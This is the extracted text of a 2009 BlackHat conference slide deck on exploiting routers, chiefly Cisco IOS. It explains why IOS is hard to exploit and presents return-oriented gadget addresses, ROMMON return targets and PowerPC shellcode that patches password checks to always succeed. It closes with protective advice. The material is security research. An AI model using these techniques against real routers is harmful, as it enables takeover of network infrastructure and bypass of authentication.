Router Exploitation

Felix ‚FX‘ Lindner

BlackHat Briefings USA
2009
 Agenda
E
D
Introduction & Motivation
C
B
A
Vulnerabilities in routers
9
8
7

Architectural considerations
6
5
4

The Return Address Dilemma
3
2
Shellcode for Routers
1
0
Protecting Routers

Watch the BlackHat-O-Meter!

 Introduction
E
Exploitation of router vulnerabilities has been shown
D
C independently before
B
Primary focus on Cisco IOS
A
9
Notable incidents in the wild have not been registered within
8
7 the security community
6
Successful but unnoticed attacks are unlikely, due to the fragile
5
4 nature of the target (more on this later)
3
All publicized incidents were based on:
2
1
Configuration issues
0

Insider attacks

Trivially exploitable functional vulnerabilities

The limited data from Recurity Labs CIR Online supports
that observation
 Motivation
E
D
Everything handling even remotely remote data
C
B gets exploited all the time
A
9
It has been established that control over
8
7 infrastructure equipment is desirable for an attacker
6
5
4

Therefore, unique obstacles obviously prevent
3
2
wide-scale & high quality exploitation of routers
1
0
Knowing these obstacles is the way to notice
developments in which the same are overcome

These developments will herald a new age
 Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
 Vulnerabilities
E
D
There is comparably little public vulnerability
C
B research for network equipment
A
9
In 2008, only 14 vulnerabilities in Cisco IOS published
8
7
Juniper only reports a memory leak and OpenSSL issues
6
5
Nothing on Nortel Networks
4
3
Vulnerabilities are often fixed as functional issues
2
1 and classified accordingly
0

E.g. “malformed packet crashes router”

Will not make it into the vulnerability databases

Information only accessible to customers
 Service Vulnerabilities
E
D

Vulnerabilities in network facing services were the
C big deal in network leaf nodes (aka. servers)
B
A
Routers run network services too
9
8
Remote administration interfaces
7
6

SNMP (see CVE-2008-0960)
5
TFTP / FTP / HTTP Services
4
Never used in well configured networks
3
2
Sloppy managed networks don’t need router exploits
1
0
Most custom implementations of router services
had vulnerabilities in the past

Apart from fixes, little changes over versions

No new vulnerabilities introduced
 Service Vulnerabilities
E
D

Routers expose little functionality to truly remote
C attackers
B
A
Routing protocols are run “internally”
9
8

EIGRP / OSPF require multicast access
7
RIP is too simple to be buggy ☺
6
5
BGP requires explicit peer configuration
4
DTP / VTP / CDP / etc. require local link access
3
2
ISIS isn’t even IP
1
0
Within a multicast domain, routers are at risk

In the Internet, network engineering principles say:
You shall not accept routing information from
arbitrary hosts.
 Service Vulnerabilities
E
A notable exception from the rules:
D
C cisco-sa-20070124-crafted-ip-option
B
A
Triggered by:
9
Internet Control Message Protocol (ICMP)
8
7
Protocol Independent Multicast version 2 (PIMv2)
6
Pragmatic General Multicast (PGM)
5
4
URL Rendezvous Directory (URD)
3
2
Vulnerability caused by individual parsing code in IOS
1
IP Options parsed after a End-of-Options (0x00) was found
0

Stack based buffer overflow in the attempt to reverse a
source route for the generated ICMP reply

It is not uncommon for routers to get pinged
 Upcoming Vulnerabilities
E
The landscape changes. Routers now support:
D
C
IPv6
B
VoIP: H.323, H.225.0, H.245.0, SIP
A
9
Lawful Interception Functionality
8
7
SSL VPN
6
Web Service Routing
5
4
XML-PI
3
Web Service Management Agent
2
1
Huawei Quidway access routers come with H.323 services
0
enabled by default

Luckily, adoption is slow.

Network engineers just don’t want application level functionality on
their devices.
 Client Side Vulnerabilities
E
D
Routers are rarely used as clients
C
B
Exceptions are:
A
9
Telnet / SSH connections into other routers
8
7
File transfers from / to the router
6
5
Authentication services (RADIUS, TACACS+)
4
3
Name resolution (DNS) – potentially unintentional
2
1
0
The new services will change that as well

Routers talking to VoIP infrastructure

Routers talking to HTTP servers

Up until now, Client Side doesn’t play a role.
 Transit Vulnerabilities
E
D

Most powerful: Vulnerabilities triggered by traffic
C passing through the router
B
A
Would be really bad if triggered after forwarding
9
8
Most unlikely: Routers try really hard to not look at
7
6
traffic
5
Inspecting packets is expensive
4
3
Forwarding should be handled in hardware as much and
2 as often as possible
1
0
Some traffic must be inspected on every hop

Source routed packets

Hop-by-Hop headers in IPv6

No true Transit Vulnerability known so far
 Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
 OS Architectures Comparison
E Product OS Design Fault Behavior Exploitability
D
C
B Cisco IOS Monolithic ELF Device Crash Hard
A
9
8 Cisco Service Linux 2.4 based Process Crash / Interesting
7 Modules Module Crash
6
5 Juniper JUNOS FreeBSD 3.x based Process Crash Probably known
4
3
2 Huawei VRP (1) VxWorks 5.x based Device Crash A little tricky
1
0
Huawei VRP (2) Linux 2.x based Process Crash Known

$DSL_Router Linux 2.x based Process Crash Known

 The Easy Ones
E
D
Router operating systems based on standard
C
B
A
UNIX architectures are respectively easy to
9
8
exploit
7
6
Virtual address spaces for every process
5
4
3

No fancy protection mechanisms
2
1
Most things run as UID 0
0

Everything behaves the way attackers know it
 The Hard One
E
D
IOS is a single large binary program (ELF) running
C
B
directly on the main CPU
A
Shared memory architecture
9
8
Virtual memory mapping according to ELF header
7
6
CPU (PPC32, MIPS32 or MIPS64) in Supervisor mode
5
4
One single shared Heap
3
2
Doubly-linked list of memory blocks
1
0
Processes are threads with CPU context and stack
block allocated on the heap

No virtual memory space

Run-to-completion scheduler (like Windows 95)
 Consequences of Design
E
D
IOS cannot recover from exceptions
C
B
Any exception causes the device to restart
A
9
IOS cannot recover from memory corruptions
8
7
Is the heap linked list corrupted, the device restarts
6
5
Integrity checks on the heap are performed with every
4
3 allocation / de-allocation
2
1
Additional integrity tests are performed by CheckHeaps
0

IOS cannot recover from CPU hogs

If a process does not return execution to the scheduler, a
CPU watchdog restarts the device
 IOS Memory Layout
E
D
Memory is laid out based on the image base
C
B
A
IO memory is laid out based on physical
9
8 interfaces and configuration
7
6
5 Static address
4
3
2 Start End Size(b) Class Media Name
1 0x03C00000 0x03FFFFFF 4194304 Iomem R/W iomem
0 0x60000000 0x60FFFFFF 16777216 Flash R/O flash
0x80000000 0x83BFFFFF
Dependencies 62914560 Local R/W main
0x8000808C 0x8095B087 9777148 IText R/O main:text
0x8095B088 0x80CDBFCB 3673924 IData R/W main:data
0x80CDBFCC 0x80DECEE7 1117980 IBss R/W main:bss
0x80DECEE8 0x83BFFFFF 48312600 Local R/W main:heap
 The IOS Image Hell
E
D
Every IOS image is built from the scratch
C
B
Contents of the build decided by:
A
9
Platform
8
Major / Minor Version
7
6
5

Release Version
4
Train
3
2
Feature-Set
1
0
Special Build

272722 different IOS Images known to the Cisco
Feature Navigator on CCO in June 2009

Theoretically, this means as many memory layouts
 The IOS Image Hell
E
D
For exploitation that means:
C
B
Assumptions about locations of specific code have a
A chance of 0.000366% to be correct
9
8
Assumptions about the start of the Heap are just as good
7
6
Since Stacks are Heap allocated blocks of memory,
5
4 correct guesses about the stack location are even less
3
2 likely
1
0
IOS’s build process provides a far higher
unpredictability of memory layout than any ASLR
technology currently in use!
 The IOS Image Hell
E
D
The image diversity is also a problem for shellcode
C
B
The whole thing is compiled at once
A
9
The image does not contain any symbols
8
7
The image does not contain an exported list of functions
6
5
There is no guarantee that structures are equal between
4
3 images
2
In fact, it’s almost guaranteed that someone at Cisco decided to
1
0 expand or reorder a structure because they felt like it.

Use of platform code (what shellcode normally
does) is not so easy on IOS.
E
D
C
B
Vulnerabilities in Routers
A
9 Architectural Considerations
8
7
6
The Return Address Dilemma
5
4
3
Shellcode for Routers
2
1 Protecting Routers
0
 Where to (re)turn to?
E
Stack: it’s somewhere in the heap (unpredictable)
D
IOS Code: it’s location depends on the image version
C
B
You would need to know the image version, which you don’t
A
You would need to have a copy of exactly that image, which you don’t
9
IOS data/rodata/bss sections: location and structure depend on the
8 image version
7
6
Comparing 1597 images for Cisco 2600, only 24 (1.5%) have a section
5 (.data) at the same address
4
12.4 images seem to use alignment for sections now
3
IOMEM: useless, not executable
2
1
Heap spray: not applicable
0
attacker has rarely any control over the heap

Partial overwrites are not an option either, as IOS runs on PPC32,
MIPS32 and MIPS64 in Big Endian mode
 The Current Best Bet
E
D
Cisco routers use a bootstrap loader called
C
B
ROMMON
A
ROMMON is mapped initially into memory through
9
8 hardware initialization
7
6
ROMMON provides a very basic CLI
5
ROMMON provides the initial exception handlers
4
3
2
ROMMON is mapped at fixed addresses
1
0xFFF00000 for Cisco 1700
0

0xFFF00000 for Cisco 2600

0x1FC00000 for Cisco 3640

0x1FC00000 for Cisco 3660
 ROMMON Versions
E
D
ROMMON Version distribution is a lot smaller
C
B
ROMMON is rarely updated
A
9
Therefore, versions depend on shipping date
8
7
Cisco prefers bulk sales of devices
6
5
4 Version 11.3(2)XA4

3 Version 12.1(3r)T1

2 Version 12.1(3r)T2
1
0 Version 12.2(10r)1

Version 12.2(6r)

Version 12.2(7r) [cmong 7r]

Version 12.2(7r)XM1

Version 12.2(8r) [cmong 8r]

C2600 Version ROMMON Distribution ROMMON Version Distribution

(based on Goolge searches) in a real world network (571 devices)
 Return Oriented Programming*
E
D
Chaining together function epilogs before
C
B
A
return to gain arbitrary functionality
9
8
One of these hacking techniques that every
7
6 sufficiently talented hacker with a need came up
5
4 with independently
3
2
1

Has been shown to work nicely on IA-32 and
0 SPARC code using an entire glibc

We have 146556 bytes (36639 instructions) and
a PowerPC CPU that returns via LR
* „Return-oriented Programming: Exploitation without Code Injection“
Erik Buchanan, Ryan Roemer, Stefan Savage, Hovav Shacham - University of California, San Diego
http://www.blackhat.com/presentations/bh-usa-08/Shacham/BH_US_08_Shacham_Return_Oriented_Programming.pdf
 Return Oriented on PowerPC Stack
Code 41414141 Buffer
E [here be buffer overflow]
overflow] 41414141 Buffer
D lwz %r0, 0x20+arg_4(%sp) 41414141 Buffer
C mtlr %r0
B
lwz %r30, 0x20+var_8(%sp) 41414141 Buffer
A
9 lwz %r31, 0x20+var_4(%sp) VALUE saved R30
8 addi %sp, %sp, 0x20 DEST.PTRsaved R31
7 blr
6 41414141 saved SP
5
4 FUNC_02 saved LR
FUNC_02: Memory write!
3 42424242 saved R28
2 stw %r30, 0xAB(%r31)
1 lwz %r0, 0x18+arg_4(%sp) 42424242 saved R29
0 mtlr %r0 VALUE2 saved R30
lwz %r28, 0x18+var_10(%sp)
lwz %r29, 0x18+var_C(%sp) DEST.PTR2saved R31
lwz %r30, 0x18+var_8(%sp) 42424242 saved SP
lwz %r31, 0x18+var_4(%sp) FUNC_02 saved LR
addi %sp, %sp, 0x18
blr stuff
 Too Much Cache
E
D
PowerPC has separate
C
B instruction and data caches
A
9
8

Executing data you just wrote
7
6
doesn’t work AAAA…AAAAA

5
4
3
2 memcpy() D-Cache
1 return Memory
0
CPU
AAAA…AAAAA
I-Cache
 More Code Reuse
stwu %sp,
sp, -0x10(%sp)
E
D
The Bootstrap code mflr
stw
stw
%r0
%r31, 0x10+var_4(%sp)
%r0, 0x10+arg_4(%sp)
C
B
A
already brings bl
mr
Disable_Interrupts
%r31, %r3
mfspr %r0, dc_cst
9
8
functionality that we cmpwi
bge
cr1, %r0, 0
cr1, NoDataCache
7
6 need: bl
bl
bl
Flush_Data_Cache
Unlock_Data_Cache
Disable_Data_Cache
5
4 Disable all caches! NoDataCache:
NoDataCache:
bl Invalidate_Instruction_Cache
3 bl Unlock_Instruction_Cache
2 bl Disable_Instruction_Cache
1 mfmsr %r0
0 rlwinm %r0, %r0, 0,28,25

IOS doesn’t care mtmsr

cmpwi
beq
%r0
cr1, %r31, 0
cr1, InterruptsAreOff
bl EnableInterrupts

But we do! InterruptsAreOff:
InterruptsAreOff:
lwz %r0, 0x10+arg_4(%sp)
mtlr %r0
lwz %r31, 0x10+var_4(%sp)
addi %sp,
sp, %sp
%sp,
sp, 0x10
blr
 Reliable Code Execution
AAAAAAAAAAAAA IO Memory
E AAAAAAAA…
mtctr SP
D bctr Exception Vectors
Return oriented P
C Cache Disable m tc tr S Code Segment
B
A Return oriented bctr 1 06
9
memory write
F EB
8 Return oriented F E
7 memory write 0x Read-Only Data
6 rch
Execute written a
5 data (code) se copy
4 Second Stage
3 Code: Data
2
1 Search for full
packet in
0 IO Memory

Run third stage

code
STACK
Heap

ROMMON
 Getting away with it
E
D

Reliable code execution is nice, but an attacker
C needs the device to stay running
B
A
We can’t just keep running our shellcode, remember the
9
8 Windows 95 scheduler?
7
6
Andy Davis et al have called the TerminateProcess
5 function of IOS
4
3
Needs the address of this function, which is again image
2
1 dependent
0

Exactly what is not wanted!

Crucial processes should not be terminated

IP Options vulnerability exploits “IP Input”
 Getting away with it
41414141
Buffer
E 41414141
Buffer
D
Remember the stack layout? 41414141
Buffer
C
B
We search the stack for a stack frame 41414141
Buffer
A
9 sequence of SP&LR upwards VALUE
saved R30
8 DEST.PTR
saved R31
7
Once found, we restore the stack pointer
6 41414141
saved SP
5 and return to the caller
4 FUNC_02
saved LR
3
This is reliable across images, as the saved R28
2
1 call stack layout does not change saved R29
0
dramatically over releases saved R30
saved R31

This has been shown to be mostly true on
saved SP
other well exploited platforms
saved LR
stuff
 The Downside of ROMMON
E
D
You need to have a copy of the respective
C
B
A
ROMMON for disassembly
9
8
ROMMON updates are available on CCO
7
6
The interesting (read: old) versions are not
5
4
3
You cannot remotely fingerprint ROMMON
2
1
It is unused dormant code
0

You still need to know what hardware
platform you are dealing with
 Alternatives to ROMMON
E
D
What if we could use the same technique, but
C
B
return into the IOS image code?
A
We can remotely fingerprint the IOS image
9
8
7

But aren’t the image addresses all random?
6
Well, that’s exactly the question
5
4
3

Performing an extensive search over multiple IOS
2
1
images for the same platform
0
Requiring a BLR instruction

Requiring LR restore via stack (R1)

Requiring write to pointer in R26-R31

Requiring single basic block
 Code Similarity (4 images)
c2600-a3jk8s-mz.122-28c c2600-a3jk8s-mz.122-29b c2600-a3jk8s-mz.122-37 c2600-a3jk8s-mz.122-46
E
8001435c stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31)
D 80014360 li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30)
C 80014364 sth r0,68(r30) lwz r9,92(r27) sth r0,68(r30) lwz r9,92(r27)
B 80014368 mr r3,r30 lhz r0,414(r9) mr r3,r30 lhz r0,414(r9)
A 8001436c lwz r0,36(r1) sth r0,72(r30) lwz r0,36(r1) sth r0,72(r30)
9 80014370 mtlr r0 stw r29,36(r30) mtlr r0 stw r29,36(r30)
8 80014374 lwz r27,12(r1) li r0,36 lwz r27,12(r1) li r0,36
7 80014378 lwz r28,16(r1) sth r0,68(r30) lwz r28,16(r1) sth r0,68(r30)
6 8001437c lwz r29,20(r1) mr r3,r30 lwz r29,20(r1) mr r3,r30
5 80014380 lwz r30,24(r1) lwz r0,36(r1) lwz r30,24(r1) lwz r0,36(r1)
4 80014384 lwz r31,28(r1) mtlr r0 lwz r31,28(r1) mtlr r0
3 80014388 addi r1,r1,32 lwz r27,12(r1) addi r1,r1,32 lwz r27,12(r1)
2 8001438c blr lwz r28,16(r1) blr lwz r28,16(r1)
1 80014390 lwz r29,20(r1) lwz r29,20(r1)
0 80014394 lwz r30,24(r1) lwz r30,24(r1)
80014398 lwz r31,28(r1) lwz r31,28(r1)
8001439c addi r1,r1,32 addi r1,r1,32
800143a0 blr blr
 Code Similarity (70 images)
c2600-a3jk8s-mz.122-28c c2600-a3jk8s-mz.122-29b c2600-a3jk8s-mz.122-37 c2600-a3jk8s-mz.122-46 c2600-a3js-mz.122-28c c2600-a3js-mz.122-29b c2600-a3js-mz.122-37 c2600-a3js-mz.122-46
E 8001435c stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31)
80014360 li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30)
D 80014364 sth r0,68(r30) lwz r9,92(r27) sth r0,68(r30) lwz r9,92(r27) sth r0,68(r30) lwz r9,92(r27) sth r0,68(r30) lwz r9,92(r27)
80014368 mr r3,r30 lhz r0,414(r9) mr r3,r30 lhz r0,414(r9) mr r3,r30 lhz r0,414(r9) mr r3,r30 lhz r0,414(r9)
C 8001436c lwz r0,36(r1) sth r0,72(r30) lwz r0,36(r1) sth r0,72(r30) lwz r0,36(r1) sth r0,72(r30) lwz r0,36(r1) sth r0,72(r30)
B 80014370
80014374
mtlr r0
lwz r27,12(r1)
stw r29,36(r30)
li r0,36
mtlr r0
lwz r27,12(r1)
stw r29,36(r30)
li r0,36
mtlr r0
lwz r27,12(r1)
stw r29,36(r30)
li r0,36
mtlr r0
lwz r27,12(r1)
stw r29,36(r30)
li r0,36
A 80014378
8001437c
lwz r28,16(r1)
lwz r29,20(r1)
sth r0,68(r30)
mr r3,r30
lwz r28,16(r1)
lwz r29,20(r1)
sth r0,68(r30)
mr r3,r30
lwz r28,16(r1)
lwz r29,20(r1)
sth r0,68(r30)
mr r3,r30
lwz r28,16(r1)
lwz r29,20(r1)
sth r0,68(r30)
mr r3,r30
9 80014380
80014384
lwz r30,24(r1)
lwz r31,28(r1)
lwz r0,36(r1)
mtlr r0
lwz r30,24(r1)
lwz r31,28(r1)
lwz r0,36(r1)
mtlr r0
lwz r30,24(r1)
lwz r31,28(r1)
lwz r0,36(r1)
mtlr r0
lwz r30,24(r1)
lwz r31,28(r1)
lwz r0,36(r1)
mtlr r0
8 80014388
8001438c
addi r1,r1,32
blr
lwz r27,12(r1)
lwz r28,16(r1)
addi r1,r1,32
blr
lwz r27,12(r1)
lwz r28,16(r1)
addi r1,r1,32
blr
lwz r27,12(r1)
lwz r28,16(r1)
addi r1,r1,32
blr
lwz r27,12(r1)
lwz r28,16(r1)
7 80014390
80014394
lwz r29,20(r1)
lwz r30,24(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r29,20(r1)
lwz r30,24(r1)
lwz r29,20(r1)
lwz r30,24(r1)
6 80014398 lwz r31,28(r1) lwz r31,28(r1) lwz r31,28(r1) lwz r31,28(r1)
8001439c addi r1,r1,32 addi r1,r1,32 addi r1,r1,32 addi r1,r1,32
5 800143a0 blr blr blr blr

4 c2600-i-mz.122-28c c2600-i-mz.122-29b c2600-i-mz.122-37 c2600-i-mz.122-46 c2600-io3-mz.122-28c c2600-io3-mz.122-29b c2600-io3-mz.122-37 c2600-io3-mz.122-46

8001435c stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31) stw r29,36(r30) sth r3,18(r31)
3 80014360 li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30) li r0,36 stw r27,184(r30)
2 80014364
80014368
sth r0,68(r30)
mr r3,r30
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,68(r30)
mr r3,r30
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,68(r30)
mr r3,r30
lwz r9,92(r27)
lhz r0,414(r9)
sth r0,68(r30)
mr r3,r30
lwz r9,92(r27)
lhz r0,414(r9)
1 8001436c
80014370
lwz r0,36(r1)
mtlr r0
sth r0,72(r30)
stw r29,36(r30)
lwz r0,36(r1)
mtlr r0
sth r0,72(r30)
stw r29,36(r30)
lwz r0,36(r1)
mtlr r0
sth r0,72(r30)
stw r29,36(r30)
lwz r0,36(r1)
mtlr r0
sth r0,72(r30)
stw r29,36(r30)
0 80014374 lwz r27,12(r1) li r0,36 lwz r27,12(r1) li r0,36 lwz r27,12(r1) li r0,36 lwz r27,12(r1) li r0,36
80014378 lwz r28,16(r1) sth r0,68(r30) lwz r28,16(r1) sth r0,68(r30) lwz r28,16(r1) sth r0,68(r30) lwz r28,16(r1) sth r0,68(r30)
8001437c lwz r29,20(r1) mr r3,r30 lwz r29,20(r1) mr r3,r30 lwz r29,20(r1) mr r3,r30 lwz r29,20(r1) mr r3,r30
80014380 lwz r30,24(r1) lwz r0,36(r1) lwz r30,24(r1) lwz r0,36(r1) lwz r30,24(r1) lwz r0,36(r1) lwz r30,24(r1) lwz r0,36(r1)
80014384 lwz r31,28(r1) mtlr r0 lwz r31,28(r1) mtlr r0 lwz r31,28(r1) mtlr r0 lwz r31,28(r1) mtlr r0
80014388 addi r1,r1,32 lwz r27,12(r1) addi r1,r1,32 lwz r27,12(r1) addi r1,r1,32 lwz r27,12(r1) addi r1,r1,32 lwz r27,12(r1)
8001438c blr lwz r28,16(r1) blr lwz r28,16(r1) blr lwz r28,16(r1) blr lwz r28,16(r1)
80014390 lwz r29,20(r1) lwz r29,20(r1) lwz r29,20(r1) lwz r29,20(r1)
80014394 lwz r30,24(r1) lwz r30,24(r1) lwz r30,24(r1) lwz r30,24(r1)
80014398 lwz r31,28(r1) lwz r31,28(r1) lwz r31,28(r1) lwz r31,28(r1)
8001439c addi r1,r1,32 addi r1,r1,32 addi r1,r1,32 addi r1,r1,32
800143a0 blr blr blr blr
 Code Dissimilarity
E c2600-a3jk8s-mz.122-28c c2600-a3jk8s-mz.122-29b
D stw r29,36(r30) sth r3,18(r31)
li r0,36 stw r27,184(r30)
C sth r0,68(r30) lwz r9,92(r27)
B mr r3,r30 lhz r0,414(r9)
A lwz r0,36(r1) sth r0,72(r30)
mtlr r0 stw r29,36(r30)
9 lwz r27,12(r1) li r0,36
8 lwz r28,16(r1) sth r0,68(r30)
lwz r29,20(r1) mr r3,r30
7 lwz r30,24(r1) lwz r0,36(r1)
6 lwz r31,28(r1) mtlr r0
5 addi r1,r1,32 lwz r27,12(r1)
blr lwz r28,16(r1)
4 lwz r29,20(r1)
3 lwz r30,24(r1)
2 lwz r31,28(r1)
addi r1,r1,32
1 blr
0

Identical Features!
 Code Similarity Results
E Count Percent Address Type
D
C
B 1597 100% - Cisco 2600 IOS 12.1 – 12.4
A with all possible feature sets
9
8 326 20.4% 80009534 Arbitrary memory write
7
6
5 249 15.6% 80040990 Fixed memory write
4
3
2 224 14.0% 80014360 Arbitrary memory write
1
0
223 13.9% 80040984 Fixed memory write

210 13.1% 80018554 Memory write with R0

 ROMMON vs. Code Similarity
E
D ROMMON Image Similarity
C
B
Perfect addresses
Likely addresses (code
A
9 (no dependencies) flow dependencies)
8
7
6

Cache disabling
Cache still an issue
5
4
30% chance of success
13% - 20% chance of
3
2 based on in-the-wild success over all
1
0 data available images

Cannot be fingerprinted
Can be fingerprinted
 Return Address Dilemma Summary
E
D
The return address is one of the hardest
C
B
A
problems in IOS exploitation
9
8
The ROMMON method is reliable
7
6
5

Iff you know or guess the ROMMON version
4
3
Code similarity appears to be promising
2
1
0

Experiments only had access to 1597 of 5961
images available for Cisco 2610-2613 (26.8%)

Work in progress…
 Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
 IOS Shellcode
E
D
Shellcode for PPC32 and MIPS32/64 is big
C
In stack overflows, it’s easy to cross the heap block
B
A boundary and corrupt the heap
9
8
Heap repairing stack shellcode can be used to temporarily repair
7 the heap until CheckHeaps verifies it or the following heap
6 block’s content is used by IOS
5
4
The stack should stay partially clean, so the return into a
3 caller still works
2
1
0
Second stage code is almost always required

IOMEM base addresses are not stable

Searching IOMEM is not reliable yet, but works

IOMEM searching will be harder on larger devices
 Bind Shellcode
E
D
Shellcode can create or modify VTYs
C
VTYs can be exposed by Telnet, RSH or SSH
B
A
Such shellcode has been shown before
9
8
7

To create a VTY, IOS functions must be called
6
5

Using fixed addresses in the image is (again) not an
4 option
3
2
Alternatively, IOS data structures can be modified
1
0
Using fixed addresses of the data structure is wrong

Using fixed offsets within the data structure is also not
reliable, as such offsets change frequently

AAA configurations must be observed!
 Alternative Shellcode Approach
E
D
Shellcode can modify the actual runtime code
C
B
instead of using it
A
Only a single code point must be identified
9
8
To cover AAA configurations, a second code point is
7
6 needed
5
4
Modified runtime image does no longer validate
3 passwords
2
1
Alternative use for the same method is disabling ACL
0
matching

Can become tricky when ACLs are used for other purposes than
just filtering incoming traffic

How to find the address of the function?
 Disassembling Shellcode
E
D
When searching for code manually, one often
C
B follows string references
A
9
8
7
6
5
4
3
2
1
0
 Disassembling Shellcode
E
D
Shellcode can do the same:
C
B
A
1. Find a unique string to determine its address
9
8 2. Find a code sequence of LIS / ADDI loading the
7
6 address of this string
5
4
Watch out for variants using the negative equivalent
3
2
Watch out for variants using ORI instead of ADDI
1
0 3. Go backwards until you find the STWU %SP
instruction, marking the beginning of the function
4. Patch the function to always return TRUE
 Disassembling Shellcode
bl .code .findlis:
findlis:
.string „Unique String to look for"
for" lwz %r4, 0x0(%r5)
.byte 0x00 rlwinm %r4, %r4, 0, 0xF81FFFFF
E .byte 0x00 cmpw %cr1, %r4, %r7
D .code:
code: bne %cr1, .findlisnext
.findlisnext
C mflr %r3 lwz %r4, 0x4(%r5)
B lmw %r29,0x0(%r3) rlwinm %r4, %r4, 0, 0xF800FFFF
A lis %r3,0x8000 cmpw %cr1, %r4, %r8
ori %r3,%r3,0x8000 beq %cr1, .loadfound
.loadfound
9 mr %r5,%r3 .findlisnext:
findlisnext:
8 .find_r29: addi %r5, %r5, 4
7 lwz %r4,0x0(%r3) b .findlis
.findlis
6 cmpw %cr1, %r4, %r29
5 bne %cr1, .findnext
.findnext .loadfound:
loadfound:
lwz %r4,0x4(%r3) xor %r6, %r6, %r6
4 cmpw %cr1, %r4, %r30 ori %r6, %r6, 0x9421
3 bne %cr1, .findnext
.findnext lhz %r4, 0x0(%r5)
2 lwz %r4,0x8(%r3) cmpw %cr1, %r4, %r6
1 cmpw %cr1, %r4, %r31 beq %cr1, .functionFound
.functionFound
0 beq %cr1, .stringfound
.stringfound addi %r5, %r5, -4
.findnext:
findnext: b .loadfound
.loadfound
addi %r3,%r3,4
b .find_r29 .functionFound:
functionFound:
# string address is now in R3 lis %r4, 0x3860
.stringfound:
stringfound: ori %r4, %r4, 0x0001
lis %r7, 0x3800 stw %r4, 0x0(%r5)
rlwinm %r6, %r3, 16, 16, 31 addi %r5,%r5,4
andi.
andi. %r8, %r3, 0xFFFF lis %r4, 0x4e80
or %r8, %r8, %r7 ori %r4, %r4, 0x0020
or %r7, %r7, %r6 stw %r4, 0x0(%r5)
 Advanced Ideas: TCL Loader
E
D
Later IOS versions include TCL interpreters
C
B
API exposed to the user
A
9
Fully featured script interpreter
8
7
6
Shellcode should be able to instantiate a new
5
4 TCL interpreter
3
2
Download third stage TCL script from remote
1
0 location via TFTP (supported by IOS)

Potentially modify interpreter to give raw memory
access if required

Christoph Weber’s PH-Neutral 0x7d9 talk
 Wet Dreams: The IOS Sniffer
E
Turning any Cisco IOS router into a full password sniffer is
D
C an naïve idea
B
The product line is designed for fast packet forwarding
A
9
Speed is achieved by doing as much as possible in hardware
8
7
“Punting” packets to perform DPI is going to kill the router with load
6
Might work on low load access routers
5
4
Lawful Interception code might change this
3
2
Increasing deployment in carrier networks (Hello Zensursula!)
1
Designed to intercept specific communication
0

Designed to be invisible to the network operator

The code is there, no matter if the MIBs are loaded
 IOS MITM
E
D
Using IOS as MITM tool has the same general
C
B problems as an arbitrary packet sniffer
A
9
Depending on feature-set, however, the
8
7 functionality might already be there
6
5
“TCP Intercept” can report TCP SEQ/ACK to a third party
4
3
Allowing to inject any traffic into the TCP stream
2
1
DNS code can report TIDs to a third party
0

Allowing to spoof any DNS response

Load balancing features can redirect HTTP requests for
arbitrary hosts
 Vulnerabilities in Routers
Architectural Considerations
The Return Address Dilemma
Shellcode for Routers
Protecting Routers
 General Router Protection
E
D
Good luck!
C
B
Prevent traffic destined to any interface of the
A
9
router itself at all cost
8
Very specific exceptions for network management
7
6
Don’t forget the loopback and tunnel interfaces
5
4
Don’t forget IPv6
3
2
1

Protect your routing protocol updates with MD5
0
Don’t run network services on routers

HTTP/HTTPS/FTP/TFTP/etc. are out of question

No matter what Cisco says, don’t run VoIP services

Monitor your Service Modules independently
 Monitor Configs and Crashes
E
D

Use a configuration monitoring tool like RANCIT
C (“Really Awesome New Cisco confIg Differ”)
B
A
Detects manual configuration changes, new interfaces,
9 new tunnels, etc.
8
7
Data structure modifications are visible in the
6 configuration
5
4
Check http://www.shrubbery.net/rancid/
3
2
Configure Core Dumping
1
For critical systems, increase Flash memory, so the
0
entire set of core files can be stored locally

For corporate networks, configure core dumping to a
central FTP server

Check http://cir.recurity-labs.com wiki for more
 Complain to Cisco
E
Nobody updates IOS and it is entirely Cisco’s fault
D
C
New IOS versions interpret configurations differently
B
New IOS versions have different defaults
A
9
Not even Cisco engineers know which
8
7
Nobody can update a network if the result would be massive
6 downtimes and outages
5
4
Decent network engineers run 12.2
3
Brave network engineers run 12.3
2
1
VoIPioneers run 12.4 (and fail)
0

Make Cisco provide clear upgrade paths

Guarantee that 12.2(13)T17 Telco  12.4(9)T6 Telco actually works

Provide tools for automatic configuration adjustment

Cisco, Do Your Job!
 Complain to Juniper, Huawei, …
E
D
The lack of security advisories for the other big
C
B
router vendors can only mean:
A 1. Their stuff is perfectly secure
9
8 2. Their stuff gets fixed silently
7
6 3. Their stuff doesn’t even get internal security testing
5
4
While silently fixing security bugs is a trend
3
2 (thanks Linus!), it’s not acceptable for
1
0 infrastructure equipment

Cisco is actually doing a better job than everyone
else in the networking industry when it comes to
product security. PSIRT FTW!
 Thank you!

Felix ´FX´ Lindner

Head

fx@recurity-labs.com

Recurity Labs GmbH, Berlin, Germany

http://www.recurity-labs.com